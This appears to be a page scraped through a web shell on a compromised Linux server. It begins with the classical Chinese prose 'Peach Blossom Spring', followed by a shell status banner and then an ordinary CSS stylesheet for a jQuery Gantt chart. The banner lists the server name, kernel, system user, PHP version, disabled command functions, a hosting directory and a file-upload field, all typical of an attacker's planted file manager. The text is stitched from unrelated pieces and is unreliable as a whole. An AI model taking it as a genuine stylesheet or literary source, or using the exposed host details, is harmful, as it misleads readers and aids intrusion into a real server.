晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。 林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。 见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝) 既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。 南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。
|
Server : Apache System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64 User : rainic ( 1014) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system Directory : /home/akaindir/public_html/crm/libraries/jquery/gantt/ |
Upload File : |
/* -------------------------------------- GRIDIFY -----------------------------------*/
.gdfTable {
table-layout: fixed;
border-collapse: separate;
border-spacing: 0;
}
.gdfTable td, .gdfTable th {
vertical-align: middle;
overflow: hidden;
text-overflow: clip;
white-space: nowrap;
font-size: 14px
}
.gdfCell {
overflow: hidden;
padding:4px 2px
}
.gdfCell.noClip{
overflow: visible;
}
.gdfColHeader {
min-width: 5px;
height: 30px;
}
.gdfCell, .gdfColHeader {
border-bottom: 1px solid #eee;
border-right: 1px solid #eee;
}
.gdfCellInput {
border: 0 none;
font-size: 12px;
height: 20px;
margin: 0;
padding: 0;
width: 100%;
background-color: #d4fbe8;
}
.gdfCellWrap {
border: 0 none;
font-size: 12px;
height: 17px;
margin: 0;
padding: 0;
width: 100%;
overflow: hidden;
background-color: #ffcccc;
}
.gdfHResizing {
cursor: w-resize;
}
/* -------------------------------------- SPLITTER -----------------------------------*/
.splitterContainer {
width: 100%;
height: 100%;
}
.splitBox1{
overflow-x: scroll;
overflow-y: hidden;
}
.splitBox2{
overflow-x: scroll;
overflow-y: auto;
}
.splitElement {
outline-style: none;
position: absolute;
height: 100%;
}
.vSplitBar {
width: 5px;
background-color: #aaa;
cursor: w-resize;
text-align: center;
color: white;
}
.fixHead{
position: absolute;
z-index: 1;
top:0;
}
/* -------------------------------------- GANTT -----------------------------------*/
.ganttTable{
table-layout:fixed;
}
.ganttTable td,.ganttTable th{
overflow: hidden;
text-overflow: clip;
white-space: nowrap;
}
.ganttHead1,.ganttHead2{
height:20px;
}
.ganttHead1 th,.ganttHead2 th{
border-left:1px solid white;
padding: 0;
margin: 0;
}
.ganttToday{
position:absolute;
top:0;
width:1px;
height:100%;
border-left:2px dotted #13AFA5;
}
.ganttHighLight{
position:absolute;
width:100%;
height:28px;
opacity:.4;
}
.ganttButtonBar{
position:relative;
padding:5px;
height:55px;
}
.ganttButtonBar .buttons, .ganttButtonBar h1 {
display:inline-block;
margin:0px 0 0 10px;
}
.ganttButtonBar .button span.teamworkIcon{
font-size: 150%
}
.ganttButtonSeparator{
border-left:1px solid gray;
padding-right:10px;
margin-left:10px;
font-size: 130%
}
.ganttLines{
position:absolute;
width:100%;
height:1px;
border-top:1px solid #eee;
z-index:1;
}
.ganttLinks{
z-index:10;
}
.end{
border-right:1px dotted #666
}
.holyH{
background-color: #9CB7AA;
}
.holy{
background-color: #FFF5E6;
}
/* -------------------------------------- TASK -----------------------------------*/
.taskBoxDiv{
position:absolute;
height:25px;
margin-top:3px;
z-index:100;
}
.taskBoxDiv .layout {
height:100%;
color:#DB2727;
border-radius:2px;
background: #eee; /* Old browsers */
border:1px solid #bbb;
}
.taskBoxDiv .taskStatus {
left:5px;
top:10px;
position:absolute;
width:10px;
height:10px;
}
.taskBoxDiv .layout .milestone{
top:0px;
position:absolute;
width:18px;
background: url(res/milestone.png) no-repeat;
height:18px;
display:none;
}
.taskBoxDiv .layout .milestone.end{
right:0;
}
.taskBoxDiv .layout .milestone.active{
display:block;
}
.taskBoxDiv.hasChild .layout{
border-top:2px solid black;
}
.taskBoxDiv .taskProgress{
height:5px;
position:absolute;
}
.taskBoxDiv .layout.extDep{
background-image:url(res/hasExternalDeps.png);
}
.taskLabel{
position:absolute;
height:28px;
color:black;
text-align:right;
padding-right:5px;
overflow:hidden;
left:-200px;
width:195px;
white-space:nowrap;
}
.taskDepLine {
border: 1px solid #9999ff;
overflow: hidden;
position: absolute;
}
.taskEditRow,.emptyRow {
height:30px;
}
.taskEditRow input{
border: 0 none;
font-size: 14px;
height: 20px;
margin: 0;
padding: 0;
width: 100%;
font-family: Arial, sans-serif
}
input[readonly]{
color: #c0c0c0;
}
.taskStatusBox{
position:absolute;
width:100px;
height:24px;
border:1px solid #a0a0a0;
background-color:#fff;
margin-top:-21px;
margin-left:-2px;
padding: 3px;
z-index: 100;
}
.taskStatus{
width:15px;
height:15px;
display:inline-block;
text-indent: 0;
position:relative;
}
.taskStatus.selected{
border:#666 2px solid;
}
.ganttTaskEditor {
padding: 10px
}
.unselectable {
-webkit-user-select: none;
-khtml-user-select: none;
-moz-user-select: none;
-o-user-select: none;
user-select: none;
}
.exp-controller{
display: none;
}
.expcoll{
display:inline-block;
cursor: pointer;
margin-left: -10px;
margin-right:2px;
width:16px;
height:16px;
background-image: url(res/toggle-expand.png);
position: relative;
top: 2px;
}
.expcoll.exp{
background-image: url(res/toggle_collapse.png);
}
.ui-resizable-helper { border: 1px dotted #00F; }
.ui-resizable-e, .ui-resizable-w {width: 5px;}
.ui-draggable{
cursor:move;
}
/*--------------------------------------------------- SVG --------------------------------------------------*/
.ganttSVGBox{
position: absolute;
top:0;
left: 0;
height: 100%;
background-color: transparent;
width: 100%;
}
.taskBoxSVG{
overflow: visible;
}
.taskBoxSVG .taskLayout{
stroke-width:1px;
stroke:#bbb;
/*fill:url('#taskGrad'); do not work on firefox*/
}
.taskLinkPathSVG{
stroke:#9999ff;
stroke-width:3px;
fill:none;
cursor:pointer;
}
.ganttLinesSVG{
stroke:#eee;
stroke-width:1;
}
.ganttTodaySVG{
stroke-width:2px;
stroke:#13AFA5;
stroke-linecap:"round";
stroke-dasharray:2,2;
}
.deSVG.deSVGdrag {
cursor: move;
}
.deSVG.deSVGhand {
cursor: ew-resize;
}
.linkHandleSVG{
display:none;
stroke:#888;
stroke-width:2px;
fill:#eee;
cursor: pointer;
}
.linkLineSVG{
stroke-width:5px;
stroke: #9999ff;
stroke-linecap:"round";
opacity: .5;
/*stroke-dasharray:5,5;*/
}
.linkOnProgress .deSVG.taskBoxSVG {
cursor:cell;
}
.taskBoxSVG.linkOver .taskLayout{
stroke-width:5px;
stroke:#9999ff;
opacity: .5;
}
.taskLabelSVG {
stroke: none;
fill:#999;
font-size: 12px;
}
.critical .taskLinkPathSVG{
stroke:red;
}
.taskBoxSVG.critical .taskLayout{
stroke:red;
}
.focused .taskLinkPathSVG{
stroke-width:5px;
stroke: #4286ff;
}
.taskBoxSVG.focused .taskLayout{
stroke-width:3px;
stroke: #4286ff;
}